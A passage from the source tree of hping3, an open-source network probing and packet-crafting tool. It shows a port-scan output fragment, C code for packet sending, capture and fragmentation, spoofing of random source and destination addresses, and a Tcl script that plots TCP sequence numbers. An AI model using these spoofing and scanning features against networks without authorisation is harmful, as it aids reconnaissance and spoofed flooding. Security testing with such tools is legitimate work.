3306 mysql : .S..A... 64 0 32767 44 43 | 6000 x11 : .S..A... 64 0 32767 44 44 | 6667 ircd : .S..A... 64 0 3072 44 45 | All replies received. Done. 46 | Not responding ports: 47 | -------------------------------------------------------------------------------- /getlhs.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: getlhs.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: getlhs.c,v 1.5 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include 14 | 15 | #include "hping2.h" 16 | #include "globals.h" 17 | 18 | 19 | int dltype_to_lhs(int dltype) 20 | { 21 | int lhs; 22 | 23 | switch(dltype) { 24 | case DLT_EN10MB: 25 | #ifdef DLT_IEEE802 26 | case DLT_IEEE802: 27 | #endif 28 | lhs = 14; 29 | break; 30 | case DLT_SLIP: 31 | case DLT_SLIP_BSDOS: 32 | lhs = 16; 33 | break; 34 | case DLT_PPP: 35 | case DLT_NULL: 36 | #ifdef DLT_PPP_SERIAL 37 | case DLT_PPP_SERIAL: 38 | #endif 39 | #ifdef DLT_LOOP 40 | case DLT_LOOP: 41 | #endif 42 | lhs = 4; 43 | break; 44 | case DLT_PPP_BSDOS: 45 | lhs = 24; 46 | break; 47 | case DLT_FDDI: 48 | lhs = 13; 49 | break; 50 | case DLT_RAW: 51 | lhs = 0; 52 | break; 53 | #ifdef DLT_IEE802_11 54 | case DLT_IEEE802_11: 55 | lhs = 14; 56 | break; 57 | #endif 58 | case DLT_ATM_RFC1483: 59 | #ifdef DLT_CIP 60 | case DLT_CIP: 61 | #endif 62 | #ifdef DLT_ATM_CLIP 63 | case DLT_ATM_CLIP: 64 | #endif 65 | lhs = 8; 66 | break; 67 | #ifdef DLT_C_HDLC 68 | case DLT_C_HDLC: 69 | lhs = 4; 70 | break; 71 | #endif 72 | #ifdef DLT_LINUX_SLL 73 | case DLT_LINUX_SLL: 74 | #endif 75 | #ifdef DLT_LANE8023 76 | case DLT_LANE8023: 77 | #endif 78 | lhs = 16; 79 | break; 80 | default: 81 | return -1; 82 | break; 83 | } 84 | return lhs; 85 | } 86 | 87 | int get_linkhdr_size(char *ifname) 88 | { 89 | int dltype = pcap_datalink(pcapfp); 90 | 91 | if (opt_debug) 92 | printf("DEBUG: dltype is %d\n", dltype); 93 | 94 | linkhdr_size = dltype_to_lhs(dltype); 95 | return linkhdr_size; 96 | } 97 | -------------------------------------------------------------------------------- /libpcap_stuff.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: libpcap_stuff.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: libpcap_stuff.c,v 1.3 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include "hping2.h" 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #include "globals.h" 23 | 24 | int open_pcap() 25 | { 26 | int on; 27 | 28 | on = 1; /* no warning if BIOCIMMEDIATE will not be compiled */ 29 | if (opt_debug) 30 | printf("DEBUG: pcap_open_live(%s, 99999, 0, 1, %p)\n", 31 | ifname, errbuf); 32 | 33 | pcapfp = pcap_open_live(ifname, 99999, 0, 1, errbuf); 34 | if (pcapfp == NULL) { 35 | printf("[open_pcap] pcap_open_live: %s\n", errbuf); 36 | return -1; 37 | } 38 | #if (!defined OSTYPE_LINUX) && (!defined __sun__) 39 | /* Return the packets to userspace as fast as possible */ 40 | if (ioctl(pcap_fileno(pcapfp), BIOCIMMEDIATE, &on) == -1) 41 | perror("[open_pcap] ioctl(... BIOCIMMEDIATE ...)"); 42 | #endif 43 | return 0; 44 | } 45 | 46 | int close_pcap() 47 | { 48 | pcap_close(pcapfp); 49 | return 0; 50 | } 51 | 52 | int pcap_recv(char *packet, unsigned int size) 53 | { 54 | char *p = NULL; 55 | int pcapsize; 56 | 57 | if (opt_debug) 58 | printf("DEBUG: under pcap_recv()\n"); 59 | 60 | while(p == NULL) { 61 | p = (char*) pcap_next(pcapfp, &hdr); 62 | if (p == NULL && opt_debug) 63 | printf("DEBUG: [pcap_recv] p = NULL\n"); 64 | } 65 | 66 | pcapsize = hdr.caplen; 67 | 68 | if (pcapsize < size) 69 | size = pcapsize; 70 | 71 | memcpy(packet, p, pcapsize); 72 | 73 | return pcapsize; 74 | } 75 | -------------------------------------------------------------------------------- /sendip_handler.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendip_handler.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 3$ 9 | */ 10 | 11 | /* $Id: sendip_handler.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | 15 | #include "hping2.h" 16 | #include "globals.h" 17 | 18 | void send_ip_handler(char *packet, unsigned int size) 19 | { 20 | ip_optlen = ip_opt_build(ip_opt); 21 | 22 | if (!opt_fragment && (size+ip_optlen+20 >= h_if_mtu)) 23 | { 24 | /* auto-activate fragmentation */ 25 | virtual_mtu = h_if_mtu-20; 26 | virtual_mtu = virtual_mtu - (virtual_mtu % 8); 27 | opt_fragment = TRUE; 28 | opt_mf = opt_df = FALSE; /* deactivate incompatible options */ 29 | if (opt_verbose || opt_debug) 30 | printf("auto-activate fragmentation, fragments size: %d\n", virtual_mtu); 31 | } 32 | 33 | if (!opt_fragment) 34 | { 35 | unsigned short fragment_flag = 0; 36 | 37 | if (opt_mf) fragment_flag |= MF; /* more fragments */ 38 | if (opt_df) fragment_flag |= DF; /* dont fragment */ 39 | send_ip((char*)&local.sin_addr, 40 | (char*)&remote.sin_addr, 41 | packet, size, fragment_flag, ip_frag_offset, 42 | ip_opt, ip_optlen); 43 | } 44 | else 45 | { 46 | unsigned int remainder = size; 47 | int frag_offset = 0; 48 | 49 | while(1) { 50 | if (remainder <= virtual_mtu) 51 | break; 52 | 53 | send_ip((char*)&local.sin_addr, 54 | (char*)&remote.sin_addr, 55 | packet+frag_offset, 56 | virtual_mtu, MF, frag_offset, 57 | ip_opt, ip_optlen); 58 | 59 | remainder-=virtual_mtu; 60 | frag_offset+=virtual_mtu; 61 | } 62 | 63 | send_ip((char*)&local.sin_addr, 64 | (char*)&remote.sin_addr, 65 | packet+frag_offset, 66 | remainder, NF, frag_offset, 67 | ip_opt, ip_optlen); 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /datafiller.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: datafiller.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: datafiller.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include /* memset */ 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | void datafiller(char *p, int size) 25 | { 26 | static int fd = 0; 27 | int readed, diff; 28 | 29 | if (!fd) { 30 | fd = open(datafilename, O_RDONLY); 31 | if (fd == -1) { 32 | perror("[datafiller] open()"); 33 | fd = 0; /* will retry to open the file for 34 | * the next packet */ 35 | memset(p, 'X', size); 36 | return; 37 | } 38 | } 39 | 40 | if (p == NULL && fd != -1) { /* seek operation */ 41 | /* size-1 because packet with id 1 start from 0 */ 42 | lseek(fd, (data_size-signlen)*(size-1), SEEK_SET); 43 | return; 44 | } 45 | 46 | restart: /* if EOF occurs, after rewind, restart */ 47 | 48 | readed = read(fd, p, size); 49 | if (readed == size) 50 | return; 51 | else if (readed == -1) { 52 | perror("[datafiller] read()"); 53 | close(fd); 54 | fd = 0; /* will retry to open the file for the next packet */ 55 | memset(p, 'X', size); 56 | return; 57 | } 58 | else if (readed < size && opt_end == FALSE) { 59 | lseek(fd, 0, SEEK_SET); 60 | if (readed == 0) 61 | goto restart; 62 | } 63 | else if (readed < size && opt_end == TRUE) { 64 | fprintf(stderr, "EOF reached, wait some second than press " 65 | "ctrl+c\n"); 66 | eof_reached = TRUE; 67 | } else { 68 | printf("[datafiller.c INTERNAL ERROR] readed = %d - " 69 | "opt_end == %d\n", readed, opt_end); 70 | exit(1); 71 | } 72 | diff = size - readed; 73 | memset(p+readed, '\0', diff); /* padding */ 74 | lseek(fd, 0, SEEK_SET); 75 | return; 76 | } 77 | -------------------------------------------------------------------------------- /listen.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: listen.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: listen.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" /* hping2.h includes hcmp.h */ 22 | #include "globals.h" 23 | 24 | void listenmain(void) 25 | { 26 | int size, ip_size; 27 | int stdoutFD = fileno(stdout); 28 | char packet[IP_MAX_SIZE+linkhdr_size]; 29 | char *p, *ip_packet; 30 | struct myiphdr ip; 31 | __u16 id; 32 | static __u16 exp_id; /* expected id */ 33 | 34 | exp_id = 1; 35 | 36 | while(1) { 37 | size = read_packet(packet, IP_MAX_SIZE+linkhdr_size); 38 | switch(size) { 39 | case 0: 40 | continue; 41 | case -1: 42 | exit(1); 43 | } 44 | 45 | /* Skip truncated packets */ 46 | if (size < linkhdr_size+IPHDR_SIZE) 47 | continue; 48 | ip_packet = packet + linkhdr_size; 49 | 50 | /* copy the ip header so it will be aligned */ 51 | memcpy(&ip, ip_packet, sizeof(ip)); 52 | id = ntohs(ip.id); 53 | ip_size = ntohs(ip.tot_len); 54 | if (size-linkhdr_size > ip_size) 55 | size = ip_size; 56 | else 57 | size -= linkhdr_size; 58 | 59 | if ((p = memstr(ip_packet, sign, size))) { 60 | if (opt_verbose) 61 | fprintf(stderr, "packet %d received\n", id); 62 | 63 | if (opt_safe) { 64 | if (id == exp_id) 65 | exp_id++; 66 | else { 67 | if (opt_verbose) 68 | fprintf(stderr, "packet not in sequence (id %d) received\n", id); 69 | send_hcmp(HCMP_RESTART, exp_id); 70 | if (opt_verbose) 71 | fprintf(stderr, "HCMP restart from %d sent\n", exp_id); 72 | continue; /* discard this packet */ 73 | } 74 | } 75 | 76 | p+=strlen(sign); 77 | write(stdoutFD, p, size-(p-ip_packet)); 78 | } 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /ip_opt_build.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memunlock.c$ 4 | * $other_author: Mika 5 | * $other_copyright: Copyright (C) 1999 Mika 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: ip_opt_build.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #include "hping2.h" 21 | #include "globals.h" 22 | 23 | unsigned char ip_opt_build(char* ip_opt) 24 | { 25 | unsigned char optlen = 0; 26 | unsigned long ip; 27 | 28 | memset(ip_opt, 1, 40); 29 | 30 | if (opt_lsrr) 31 | { 32 | if (lsr_length<=39) 33 | { 34 | memcpy(ip_opt, &lsr, lsr_length); 35 | optlen += lsr_length; 36 | } 37 | else 38 | { 39 | printf("Warning: loose source route is too long, discarding it"); 40 | opt_lsrr=0; 41 | } 42 | } 43 | 44 | if (opt_ssrr) 45 | { 46 | if (ssr_length+optlen<=39) 47 | { 48 | memcpy(ip_opt + optlen, &ssr, ssr_length); 49 | optlen += ssr_length; 50 | } 51 | else 52 | { 53 | printf("Warning: strict source route is too long, discarding it"); 54 | opt_ssrr=0; 55 | } 56 | } 57 | 58 | if (opt_rroute) 59 | { 60 | if (optlen<=33) 61 | { 62 | ip_opt[optlen]=IPOPT_RR; 63 | ip_opt[optlen+1]=39-optlen; 64 | ip_opt[optlen+2]=8; 65 | ip=inet_addr("1.2.3.4"); 66 | memcpy(ip_opt+optlen+3,&ip,4); 67 | optlen=39; 68 | } 69 | else 70 | { 71 | printf("Warning: no room for record route, discarding option\n"); 72 | opt_rroute=0; 73 | } 74 | } 75 | 76 | if (optlen) 77 | { 78 | optlen = (optlen + 3) & ~3; 79 | ip_opt[optlen-1] = 0; 80 | return optlen; 81 | } 82 | else 83 | return 0; 84 | } 85 | 86 | -------------------------------------------------------------------------------- /logicmp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: logicmp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: logicmp.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include /* this should be not needed, but ip_icmp.h lacks it */ 15 | 16 | #include "hping2.h" 17 | #include "globals.h" 18 | 19 | void log_icmp_timeexc(char *src_addr, unsigned short icmp_code) 20 | { 21 | switch(icmp_code) { 22 | case ICMP_EXC_TTL: 23 | printf("TTL 0 during transit from ip=%s", src_addr); 24 | break; 25 | case ICMP_EXC_FRAGTIME: 26 | printf("TTL 0 during reassembly from ip=%s", src_addr); 27 | break; 28 | } 29 | if (opt_gethost) { 30 | char *hostn; 31 | 32 | fflush(stdout); 33 | hostn = get_hostname(src_addr); 34 | printf("name=%s", (hostn) ? hostn : "UNKNOWN"); 35 | } 36 | putchar('\n'); 37 | } 38 | 39 | void log_icmp_unreach(char *src_addr, unsigned short icmp_code) 40 | { 41 | static char* icmp_unreach_msg[]={ 42 | "Network Unreachable from", /* code 0 */ 43 | "Host Unreachable from", /* code 1 */ 44 | "Protocol Unreachable from", /* code 2 */ 45 | "Port Unreachable from", /* code 3 */ 46 | "Fragmentation Needed/DF set from", /* code 4 */ 47 | "Source Route failed from", /* code 5 */ 48 | NULL, /* code 6 */ 49 | NULL, /* code 7 */ 50 | NULL, /* code 8 */ 51 | NULL, /* code 9 */ 52 | NULL, /* code 10 */ 53 | NULL, /* code 11 */ 54 | NULL, /* code 12 */ 55 | "Packet filtered from", /* code 13 */ 56 | "Precedence violation from", /* code 14 */ 57 | "precedence cut off from" /* code 15 */ 58 | }; 59 | 60 | if (icmp_unreach_msg[icmp_code] != NULL) 61 | printf("ICMP %s ip=%s", icmp_unreach_msg[icmp_code], src_addr); 62 | else 63 | printf("ICMP Unreachable type=%d from ip=%s", 64 | icmp_code, src_addr); 65 | 66 | if (opt_gethost) { 67 | char *hostn; 68 | 69 | fflush(stdout); 70 | hostn = get_hostname(src_addr); 71 | printf("name=%s", (hostn) ? hostn : "UNKNOWN"); 72 | } 73 | putchar('\n'); 74 | } 75 | -------------------------------------------------------------------------------- /hstring.c: -------------------------------------------------------------------------------- 1 | /* hstring.c - Random string-related functions for hping. 2 | * Copyright(C) 2003 Salvatore Sanfilippo 3 | * All rights reserved */ 4 | 5 | /* $Id: hstring.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 6 | 7 | #include 8 | #include 9 | #include 10 | 11 | /* return 1 if the string looks like an integer number 12 | * otherwise 0 is returned. 13 | * 14 | * this function is equivalent to this regexp: 15 | * [:space:]*-{0,1}[0-9]+[:space:]* 16 | * in english: 17 | * (0-inf spaces)(zero or one -)(1-inf digits)(0-inf spaces) 18 | */ 19 | int strisnum(char *s) 20 | { 21 | int digits = 0; /* used to return false if there aren't digits */ 22 | 23 | while(isspace(*s)) 24 | s++; /* skip initial spaces */ 25 | if (*s == '-') /* negative number? */ 26 | s++; 27 | while(*s) { 28 | if (isspace(*s)) { /* skip spaces in the tail */ 29 | while(isspace(*s)) 30 | s++; 31 | if (*s) return 0; /* but don't allow other tail chars */ 32 | return digits ? 1 : 0; 33 | } 34 | if (!isdigit(*s)) 35 | return 0; 36 | s++; 37 | digits++; 38 | } 39 | return digits ? 1 : 0; 40 | } 41 | 42 | /* function similar to strtok() more convenient when we know the 43 | * max number of tokens, to tokenize with a single call. 44 | * Unlike strtok(), strftok() is thread safe. 45 | * 46 | * ARGS: 47 | * 'sep' is a string that contains all the delimiter characters 48 | * 'str' is the string to tokenize, that will be modified 49 | * 'tptrs' is an array of char* poiters that will contain the token pointers 50 | * 'nptrs' is the length of the 'tptrs' array. 51 | * 52 | * RETURN VALUE: 53 | * The number of extracted tokens is returned. 54 | */ 55 | size_t strftok(char *sep, char *str, char **tptrs, size_t nptrs) 56 | { 57 | size_t seplen = strlen(sep); 58 | size_t i, j = 0; 59 | int inside = 0; 60 | 61 | while(*str) { 62 | for(i = 0; i < seplen; i++) { 63 | if (sep[i] == *str) 64 | break; 65 | } 66 | if (i == seplen) { /* no match */ 67 | if (!inside) { 68 | tptrs[j++] = str; 69 | inside = 1; 70 | } 71 | } else { /* match */ 72 | if (inside) { 73 | *str = '\0'; 74 | if (j == nptrs) 75 | return j; 76 | inside = 0; 77 | } 78 | } 79 | str++; 80 | } 81 | return j; 82 | } 83 | -------------------------------------------------------------------------------- /sendudp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendudp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sendudp.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | /* void hexdumper(unsigned char *packet, int size); */ 25 | 26 | void send_udp(void) 27 | { 28 | int packet_size; 29 | char *packet, *data; 30 | struct myudphdr *udp; 31 | struct pseudohdr *pseudoheader; 32 | 33 | packet_size = UDPHDR_SIZE + data_size; 34 | packet = malloc(PSEUDOHDR_SIZE + packet_size); 35 | if (packet == NULL) { 36 | perror("[send_udphdr] malloc()"); 37 | return; 38 | } 39 | pseudoheader = (struct pseudohdr*) packet; 40 | udp = (struct myudphdr*) (packet+PSEUDOHDR_SIZE); 41 | data = (char*) (packet+PSEUDOHDR_SIZE+UDPHDR_SIZE); 42 | 43 | memset(packet, 0, PSEUDOHDR_SIZE+packet_size); 44 | 45 | /* udp pseudo header */ 46 | memcpy(&pseudoheader->saddr, &local.sin_addr.s_addr, 4); 47 | memcpy(&pseudoheader->daddr, &remote.sin_addr.s_addr, 4); 48 | pseudoheader->protocol = 17; /* udp */ 49 | pseudoheader->lenght = htons(packet_size); 50 | 51 | /* udp header */ 52 | udp->uh_dport = htons(dst_port); 53 | udp->uh_sport = htons(src_port); 54 | udp->uh_ulen = htons(packet_size); 55 | 56 | /* data */ 57 | data_handler(data, data_size); 58 | 59 | /* compute checksum */ 60 | #ifdef STUPID_SOLARIS_CHECKSUM_BUG 61 | udp->uh_sum = packet_size; 62 | #else 63 | udp->uh_sum = cksum((__u16*) packet, PSEUDOHDR_SIZE + 64 | packet_size); 65 | #endif 66 | 67 | /* adds this pkt in delaytable */ 68 | delaytable_add(sequence, src_port, time(NULL), get_usec(), S_SENT); 69 | 70 | /* send packet */ 71 | send_ip_handler(packet+PSEUDOHDR_SIZE, packet_size); 72 | free(packet); 73 | 74 | sequence++; /* next sequence number */ 75 | 76 | if (!opt_keepstill) 77 | src_port = (sequence + initsport) % 65536; 78 | 79 | if (opt_force_incdport) 80 | dst_port++; 81 | } 82 | -------------------------------------------------------------------------------- /random.c: -------------------------------------------------------------------------------- 1 | /* rc4-based pseudo-random number generator for hping. 2 | * Copyright (C) 2003 Salvatore Sanfilippo 3 | * This software is released under the GPL license 4 | * All rights reserved */ 5 | 6 | /* $Id: random.c,v 1.3 2004/06/04 07:22:38 antirez Exp $ */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include "fixtypes.h" 15 | 16 | u_int32_t hp_rand(void); 17 | 18 | /* The rc4 sbox */ 19 | static unsigned char rc4_sbox[256]; 20 | /* This flags is used to initialize the sbox the first time, 21 | * without an explicit intialization step outside this file. */ 22 | static int rc4_seedflag = 0; 23 | 24 | /* Initialize the sbox with pseudo random data */ 25 | static void hp_rand_init(void) 26 | { 27 | int i, fd; 28 | 29 | /* Strong sbox initialization */ 30 | fd = open("/dev/urandom", O_RDONLY); 31 | if (fd != -1) { 32 | read(fd, rc4_sbox, 256); 33 | close(fd); 34 | } 35 | /* Weaker sbox initialization */ 36 | for (i = 0; i < 256; i++) { 37 | struct timeval tv; 38 | gettimeofday(&tv, NULL); 39 | if (i&1) 40 | rc4_sbox[i] ^= (tv.tv_usec >> (i&0xF)) & 0xFF; 41 | else 42 | rc4_sbox[i] ^= (tv.tv_sec >> (i&0xF)) & 0xFF; 43 | } 44 | rc4_seedflag = 1; 45 | } 46 | 47 | #if 0 48 | /* Re-seed the generator with user-provided bytes. Not used for now. */ 49 | static void hp_rand_seed(void *seed, size_t len) 50 | { 51 | int i; 52 | 53 | if (len > 256) len = 256; 54 | memcpy(rc4_sbox, seed, len); 55 | /* discard the first 256 bytes of output after the reseed */ 56 | for (i = 0; i < 32; i++) 57 | (void) hp_rand(); 58 | } 59 | #endif 60 | 61 | /* Generates a 32bit random number using an RC4-like algorithm */ 62 | u_int32_t hp_rand(void) 63 | { 64 | u_int32_t r = 0; 65 | unsigned char *rc = (unsigned char*) &r; 66 | static unsigned int i = 0, j = 0; 67 | unsigned int si, sj, x; 68 | 69 | /* initialization, only needed the first time */ 70 | if (!rc4_seedflag) 71 | hp_rand_init(); 72 | /* generates 4 bytes of pseudo-random data using RC4 */ 73 | for (x = 0; x < 4; x++) { 74 | i = (i+1) & 0xff; 75 | si = rc4_sbox[i]; 76 | j = (j + si) & 0xff; 77 | sj = rc4_sbox[j]; 78 | rc4_sbox[i] = sj; 79 | rc4_sbox[j] = si; 80 | *rc++ = rc4_sbox[(si+sj)&0xff]; 81 | } 82 | return r; 83 | } 84 | 85 | -------------------------------------------------------------------------------- /send.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendudp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: send.c,v 1.1.1.1 2003/08/31 17:23:53 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | static void select_next_random_source(void) 25 | { 26 | unsigned char ra[4]; 27 | 28 | ra[0] = hp_rand() & 0xFF; 29 | ra[1] = hp_rand() & 0xFF; 30 | ra[2] = hp_rand() & 0xFF; 31 | ra[3] = hp_rand() & 0xFF; 32 | memcpy(&local.sin_addr.s_addr, ra, 4); 33 | 34 | if (opt_debug) 35 | printf("DEBUG: the source address is %u.%u.%u.%u\n", 36 | ra[0], ra[1], ra[2], ra[3]); 37 | } 38 | 39 | static void select_next_random_dest(void) 40 | { 41 | unsigned char ra[4]; 42 | char a[4], b[4], c[4], d[4]; 43 | 44 | if (sscanf(targetname, "%4[^.].%4[^.].%4[^.].%4[^.]", a, b, c, d) != 4) 45 | { 46 | fprintf(stderr, 47 | "wrong --rand-dest target host, correct examples:\n" 48 | " x.x.x.x, 192,168.x.x, 128.x.x.255\n" 49 | "you typed: %s\n", targetname); 50 | exit(1); 51 | } 52 | a[3] = b[3] = c[3] = d[3] = '\0'; 53 | 54 | ra[0] = a[0] == 'x' ? (hp_rand() & 0xFF) : strtoul(a, NULL, 0); 55 | ra[1] = b[0] == 'x' ? (hp_rand() & 0xFF) : strtoul(b, NULL, 0); 56 | ra[2] = c[0] == 'x' ? (hp_rand() & 0xFF) : strtoul(c, NULL, 0); 57 | ra[3] = d[0] == 'x' ? (hp_rand() & 0xFF) : strtoul(d, NULL, 0); 58 | memcpy(&remote.sin_addr.s_addr, ra, 4); 59 | 60 | if (opt_debug) { 61 | printf("DEBUG: the dest address is %u.%u.%u.%u\n", 62 | ra[0], ra[1], ra[2], ra[3]); 63 | } 64 | } 65 | 66 | /* The signal handler for SIGALRM will send the packets */ 67 | void send_packet (int signal_id) 68 | { 69 | int errno_save = errno; 70 | 71 | if (opt_rand_dest) 72 | select_next_random_dest(); 73 | if (opt_rand_source) 74 | select_next_random_source(); 75 | 76 | if (opt_rawipmode) send_rawip(); 77 | else if (opt_icmpmode) send_icmp(); 78 | else if (opt_udpmode) send_udp(); 79 | else send_tcp(); 80 | 81 | sent_pkt++; 82 | Signal(SIGALRM, send_packet); 83 | 84 | if (count != -1 && count == sent_pkt) { /* count reached? */ 85 | Signal(SIGALRM, print_statistics); 86 | alarm(COUNTREACHED_TIMEOUT); 87 | } else if (!opt_listenmode) { 88 | if (opt_waitinusec == FALSE) 89 | alarm(sending_wait); 90 | else 91 | setitimer(ITIMER_REAL, &usec_delay, NULL); 92 | } 93 | errno = errno_save; 94 | } 95 | -------------------------------------------------------------------------------- /lib/show-tcpseq.htcl: -------------------------------------------------------------------------------- 1 | # Show TCP sequence numbers read from the specified interface's traffic 2 | # graphically. If you click on the points with the mouse, the IP address 3 | # of the associated host is shown, and all the traffic about that 4 | # host gets highlighted. 5 | 6 | if {![llength $argv]} { 7 | puts stderr "Please, specify the name of an interface" 8 | exit 9 | } 10 | set ifname [lindex $argv 0] 11 | 12 | package require Tk 13 | source hpingstdlib.htcl 14 | 15 | set bgcolor {#000000} 16 | wm title . {hping3 -- show-tcpseq} 17 | set w .main 18 | frame $w 19 | pack $w -side top 20 | . config -background $bgcolor 21 | $w config -background $bgcolor 22 | 23 | # colors 24 | set colors {red green blue gray yellow purple cyan brown} 25 | set coloridx 0 26 | array set hosts {} 27 | set start_time [clock seconds] 28 | 29 | proc getcolor {} { 30 | global colors coloridx 31 | 32 | set l [llength $colors] 33 | set i [expr $coloridx % $l] 34 | set c [lindex $colors $i] 35 | incr coloridx 36 | return $c 37 | } 38 | 39 | # canvas 40 | set xres 1024 41 | set yres 760 42 | canvas $w.can -width $xres -height $yres 43 | $w.can config -background $bgcolor 44 | pack $w.can -fill both -expand true 45 | $w.can bind all {ButtonPress %x %y %W} 46 | $w.can bind all {ButtonRelease %x %y %W} 47 | 48 | # bindings 49 | proc ButtonPress {x y W} { 50 | global tag 51 | 52 | set id [$W find closest $x $y] 53 | set tags [$W gettags $id] 54 | set tag [lindex $tags 0] 55 | set name [hping resolve -ptr $tag] 56 | 57 | # Highlight all the points about that IP address 58 | $W itemconfigure $tag -width 1 -outline gray70 59 | $W create text $x $y -text $name -tag nametext -fill white -anchor n 60 | } 61 | 62 | proc ButtonRelease {x y W} { 63 | global tag hosts 64 | 65 | # Restore the color 66 | $W itemconfigure $tag -width 0 67 | $W delete nametext 68 | } 69 | 70 | # main loop 71 | while {1} { 72 | set packets [hping recv $::ifname 100] 73 | foreach p $packets { 74 | if {![hping hasfield tcp seq $p]} continue 75 | set seq [hping getfield tcp seq $p] 76 | set ip [hping getfield ip saddr $p] 77 | if {[haskey hosts $ip]} { 78 | set color $hosts($ip) 79 | } else { 80 | set color [getcolor] 81 | set hosts($ip) $color 82 | } 83 | set now [clock seconds] 84 | set elapsed [expr {$now-$start_time}] 85 | if {$elapsed >= $xres} { 86 | set start_time $now 87 | set elapsed 0 88 | $w.can delete all 89 | } 90 | set y [expr {int($seq/5651272)}] 91 | set x $elapsed 92 | #puts "$seq -> $y" 93 | $w.can create oval $x $y [expr $x+3] [expr $y+3] -fill $color -width 0 -tag $ip 94 | } 95 | update 96 | } 97 | 98 | # vim: filetype=tcl softtabstop=4 99 | -------------------------------------------------------------------------------- /Makefile.in: -------------------------------------------------------------------------------- 1 | # $smu-mark$ 2 | # $name: Makefile.in$ 3 | # $author: Salvatore Sanfilippo 'antirez'$ 4 | # $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 5 | # $license: This software is under GPL version 2 of license$ 6 | # $date: Sun Jul 25 17:56:15 MET DST 1999$ 7 | # $rev: 3$ 8 | 9 | CC= gcc 10 | AR=/usr/bin/ar 11 | RANLIB=/usr/bin/ranlib 12 | CCOPT= -O2 -Wall @PCAP_INCLUDE@ @TCL_INC@ @USE_TCL@ 13 | DEBUG= -g 14 | #uncomment the following if you need libpcap based build under linux 15 | #(not raccomanded) 16 | COMPILE_TIME= 17 | INSTALL_MANPATH=@MANPATH@ 18 | @PCAP@ 19 | 20 | ARSOBJ = ars.o apd.o split.o rapd.o 21 | 22 | OBJ= 